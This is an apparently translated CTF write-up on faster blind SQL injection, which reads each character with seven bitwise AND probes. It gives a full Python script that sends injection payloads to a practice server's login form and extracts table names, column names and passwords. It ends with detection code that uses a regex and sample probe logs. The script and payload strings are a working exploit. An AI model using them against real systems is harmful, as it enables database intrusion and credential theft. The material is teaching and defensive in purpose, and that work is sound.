Most earlier SQL blind-injection brute-force scripts work by iterating over a string of printable characters and comparing each one, guessing the correct character value. Yesterday I came across the idea of guessing a string with the bitwise AND operation: each character value can be determined with only 7 AND operations, somewhat like binary search, which is a significant efficiency gain over plain enumeration.

For details see this article:
让你的SQL盲注快起来 (Make your SQL blind injection faster)

The AND-operation guessing script is as follows:

def compute_by_and(word):
    # Reconstruct every character of word bit by bit and print the result
    for ele in word:
        ele_b = get_character(ele)
        print("Guess the value {}:{}".format(ele_b, chr(ele_b)))

def get_character(char):
    # Test bits 0..6 (2**0 .. 2**6) with AND; an ASCII code fits in 7 bits
    char_b = ord(char)
    value = 0
    for i in range(7):
        if char_b & (2**i):
            value = value + (2**i)
    return value

Let's practice on a CTF challenge.

Link:
http://111.230.11.183:44444/basic_skills/sql/sql3.php
Python SQL blind-injection script

#coding:utf-8
import requests
import urllib
url = "http://111.230.11.183:44444/basic_skills/sql/sql3.php"
table_payload = "a' or 1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))&{2} -- "
column_payload = "a' or 1 and ascii(substr((select column_name from information_schema.columns where table_name='user' limit {0},1),{1},1))&{2} -- +"
flag_payload = "a' or 1 and ascii(substr((select password from user limit {0},1),{1},1))&{2} -- "
# The MySQL comment marker -- in the payload must be followed by a space

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://111.230.11.183:44444",
    "Connection": "close",
    "Referer": "http://111.230.11.183:44444/basic_skills/sql/sql3.php",
    "Upgrade-Insecure-Requests": "1"
}

def get_information():
    all_name = "result:"  # everything found so far
    for i in range(15):  # row index (limit i,1)
        name = ""  # the single value currently being read
        for j in range(1, 33):  # character position within the value
            value = 0  # reconstructed ASCII code
            for k in range(7):  # probe bits 0..6 with mask 2**k
                #payload=table_payload.format(i,j,(2**k))
                #payload=column_payload.format(i,j,(2**k))
                payload = flag_payload.format(i, j, (2**k))
                #payload=urllib.quote(payload)
                #print(payload)
                data = {
                    "username": payload,
                    "password": "sdf"
                }
                rep = requests.post(url=url, headers=headers, data=data, allow_redirects=False)
                if rep.status_code == 302:  # redirect means the condition was true, so the bit is set
                    value = value + (2**k)
            if value == 0:  # ASCII 0: end of this value
                if name == "":  # empty value: no more rows
                    print(all_name)
                    return 1
                all_name = all_name + " " + name
                break
            name = name + chr(value)
            print(name)

if __name__ == "__main__":
    get_information()
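From the defender's side, the same trick leaves a distinctive trace: for one row and one character position, seven requests arrive that differ only in a power-of-two mask after the AND. The following detection logic is an added example, not part of the original post; the log lines are constructed decoded POST bodies in the shape of the payloads above, and the regex assumes that shape.

```python
import re
from collections import defaultdict

# Constructed sample of decoded POST bodies (not taken from the original
# post): seven probes for row 0, position 1 with masks 1..64, plus one
# ordinary login.
PROBE_BODY = ("username=a' or 1 and ascii(substr((select password from user "
              "limit 0,1),1,1))&{} -- &password=sdf")
SAMPLE_LOG = [PROBE_BODY.format(1 << k) for k in range(7)] + [
    "username=alice&password=hunter2",
]

# Shape of the post's payloads:
#   ascii(substr((<subquery> limit <row>,1),<pos>,1))&<mask>
PROBE = re.compile(
    r"ascii\(substr\(\(.*?limit\s*(\d+)\s*,\s*1\)\s*,\s*(\d+)\s*,\s*1\)\)\s*&\s*(\d+)",
    re.IGNORECASE,
)

def detect_bitwise_probes(lines, bits=7):
    """Group single-bit AND probes by (row, position).

    Returns {(row, pos): (sorted masks, complete)} where complete is True
    when every mask 2**0 .. 2**(bits-1) was seen, i.e. one full character
    was read out of that position."""
    seen = defaultdict(set)
    for line in lines:
        m = PROBE.search(line)
        if not m:
            continue
        row, pos, mask = (int(g) for g in m.groups())
        if mask and (mask & (mask - 1)) == 0:  # keep single-bit masks only
            seen[(row, pos)].add(mask)
    full = {1 << k for k in range(bits)}
    return {key: (sorted(masks), masks == full) for key, masks in seen.items()}

if __name__ == "__main__":
    for (row, pos), (masks, complete) in sorted(detect_bitwise_probes(SAMPLE_LOG).items()):
        state = "fully extracted" if complete else "partially probed"
        print("bitwise blind SQLi: row {} position {} {} ({} probes)".format(
            row, pos, state, len(masks)))
```

Seven probes per character is also a useful rate signal: a single client issuing bursts of exactly seven near-identical requests per position stands out even when the payload is obfuscated enough to miss the regex.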

Reference:

让你的SQL盲注快起来